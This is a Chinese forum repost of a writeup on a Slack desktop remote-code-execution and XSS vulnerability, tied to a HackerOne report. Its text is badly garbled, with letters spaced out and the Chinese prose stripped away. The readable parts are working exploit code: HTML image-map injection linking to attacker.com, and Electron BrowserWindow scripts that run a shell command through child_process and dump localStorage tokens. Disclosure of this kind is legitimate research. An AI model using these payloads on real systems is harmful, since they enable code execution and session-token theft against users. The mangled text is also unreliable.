搜索

[15839] 2020-09-11_安全研究Slack桌面应用程序的RCE漏洞+XSS漏洞

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-18
2020-09-11_安全研究Slack桌面应用程序的RCE漏洞+XSS漏洞   |   S l a c k R C E + X S S c l o u d s   F r e e B u f   2 0 2 0 - 0 9 - 1 1 S l a c k X S S H T M L j a v a s c r i p t b u g W r i t e u p H T M L S l a c k S l a c k R C E R C E H T M L J a v a s c r i p t     p a y l o a d S l a c k X S S X S S R C E S l a c k 1 R C E   p a y l o a d S l a c k 2 H T M L S l a c k S l a c k   P o s t 3 H T M L S l a c k R C E P a y l o a d H T M L S l a c k J S O N H T M L S l a c k 1 S l a c k S l a c k h t t p s : / / f i l e s . s l a c k . c o m J S O N : / a p i / f i l e s . i n f o U R L / a p i / f i l e s . i n f o U R L h t t p s : / / f i l e s . s l a c k . c o m / f i l e s - p r i / { T E A M _ I D } - { F I L E _ I D } / T I T L E 访 J S O N 2 H T M L P a y l o a d S l a c k J S O N H T M L i f r a m e ,   a p p l e t ,   m e t a ,   s c r i p t , f o r m t a r g e t _ b l a n k C S P H T M L J a v a s c r i p t 使 C S P H T M L a r e a   m a p R C E 访 { " f u l l " : " < p > c o n t e n t < / p > " , " p r e v i e w " : " < p > c o n t e n t < / p > " }
J S O N J S O N P a y l o a d J S O N B u r p J a v a s c r i p t J S O N f i l e t y p d o c J S O N P a y l o a d / a p i / f i l e s . e d i t B u r p C S P H T M L J a v a s c r i p t H T M L P a y l o a d P a y l o a d u s e m a p S l a c k J S O N J S O N 3 R C E P a y l o a d a r e a h t t p s : / / a t t a c k e r . c o m / t . h t m l R C E t . h t m l h t t p s : / / { Y O U R - T E A M - H O S T N A M E } . s l a c k . c o m / f i l e s / { Y O U R - M E M B E R - I D } / { F I L E - I D } / t i t l e / e d i t < i m g   s r c = " h t t p s : / / f i l e s . s l a c k . c o m / f i l e s - t m b / T 0 2 A V L 3 A F - F S U E 0 4 U 2 D - 8 8 1 f 6 9 2 a 2 5 / s c r e e n s h o t _ 2 0 2 0 - 0 1 - 2 6 _ a t _ 2 1 . 1 2 . 2 0 _ 3 6 0 . p n g "   w i d t h = " 1 0 0 0 0 "   h e i g h t = " 1 0 0 0 0 "   u s e m a p = " # s l a c k - i m g " > < m a p   n a m e = " s l a c k - i m g " > < a r e a   s h a p e = " r e c t "   c o o r d s = " 1 0 0 0 0 , 1 0 0 0 0   0 , 0 "   h r e f = " h t t p s : / / a t t a c k e r . c o m / t . h t m l "   t a r g e t = " _ s e l f " > < / m a p > h t t p s : / / { Y O U R - T E A M - H O S T N A M E } . s l a c k . c o m / f i l e s / { Y O U R - M E M B E R - I D } / { F I L E - I D } / t i t l e / e d i t {     " f u l l " :   " a s d " ,     " p r e v i e w " :   " < i m g   s r c = " h t t p s : / / f i l e s . s l a c k . c o m / f i l e s - t m b / T 0 2 A V L 3 A F - F S U E 0 4 U 2 D - 8 8 1 f 6 9 2 a 2 5 / s c r e e n s h o t _ 2 0 2 0 - 0 1 - 2 6 _ a t _ 2 1 . 1 2 . 2 0 _ 3 6 0 . p n g "   w i d t h = " 1 0 0 0 0 "   h e i g h t = " 1 0 0 0 0 "   u s e m a p = } < h t m l > < b o d y > < s c r i p t >     / /   o v e r w r i t e   f u n c t i o n s   t o   g e t   a   B r o w s e r W i n d o w   o b j e c t :
R C E o p e n   / A p p l i c a t i o n s / C a l c u l a t o r . a p p c a l c 4 t . h t m l S l a c k t o k e n B r o w s e r W i n d o w t u n n e l S l a c k J a v a s c r i p t S l a c k S l a c k X S S R C E S l a c k h t t p s : / / f i l e s . s l a c k . c o m t e x t / h t m l J S O N R C E   P a y l o a d     / /   o v e r w r i t e   f u n c t i o n s   t o   g e t   a   B r o w s e r W i n d o w   o b j e c t :     w i n d o w . d e s k t o p . d e l e g a t e   =   { }     w i n d o w . d e s k t o p . d e l e g a t e . c a n O p e n U R L I n W i n d o w   =   ( )   = >   t r u e     w i n d o w . d e s k t o p . w i n d o w   =   { }     w i n d o w . d e s k t o p . w i n d o w . o p e n   =   ( )   = >   1     b w   =   w i n d o w . o p e n ( ' a b o u t : b l a n k ' )   / /   l e a k   B r o w s e r W i n d o w   c l a s s     n b w   =   n e w   b w . c o n s t r u c t o r ( { s h o w :   f a l s e ,   w e b P r e f e r e n c e s :   { n o d e I n t e g r a t i o n :   t r u e } } )   / /   l e t ' s   m a k e   o u r   o w n   w i t h   n o d e I n t e g r a t i o n     n b w . l o a d U R L ( ' a b o u t : b l a n k ' )   / /   n e e d   t o   l o a d   s o m e   U R L   f o r   i n t e r a c t i o n     n b w . w e b C o n t e n t s . e x e c u t e J a v a S c r i p t ( ' t h i s . r e q u i r e ( " c h i l d _ p r o c e s s " ) . e x e c ( " o p e n   / A p p l i c a t i o n s / C a l c u l a t o r . a p p " ) ' )   / /   e x e c   c o m m a n d < / s c r i p t > < / b o d y > < / h t m l > < h t m l > < b o d y > < s c r i p t >     w i n d o w . d e s k t o p . d e l e g a t e   =   { }     w i n d o w . d e s k t o p . d e l e g a t e . c a n O p e n U R L I n W i n d o w   =   ( )   = >   t r u e     w i n d o w . d e s k t o p . w i n d o w   =   { }     w i n d o w . d e s k t o p . w i n d o w . o p e n   =   ( )   = >   1     b w   =   w i n d o w . o p e n ( ' a b o u t : b l a n k ' )     n b w   =   n e w   b w . c o n s t r u c t o r ( { s h o w :   f a l s e } )   / /   n o d e   n o t   n e c e s s a r y   f o r   t h i s   d e m o     n b w . l o a d U R L ( ' h t t p s : / / a p p . s l a c k . c o m / r o b o t s . t x t ' )   / /   r o b o t s . t x t   f o r   s p e e d ,   a p p . s l a c k . c o m   g i v e s   u s   t h e   u s e r ' s   f u l l   e n v i r o n m e n t       n b w . w e b C o n t e n t s . e x e c u t e J a v a S c r i p t ( ' a l e r t ( J S O N . s t r i n g i f y ( l o c a l S t o r a g e ) ) ' ) < / s c r i p t > < / b o d y > < / h t m l >
X S S R C E m a c O S H T M L   R C E   P a y l o a d 1 2 S l a c k 3 f i l e s . s l a c k . c o m X S S 1 * . s l a c k . c o m H T M L 2 3 R C E h t t p s : / / h a c k e r o n e . c o m / r e p o r t s / 7 8 3 8 7 7 h a c k e r o n e

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理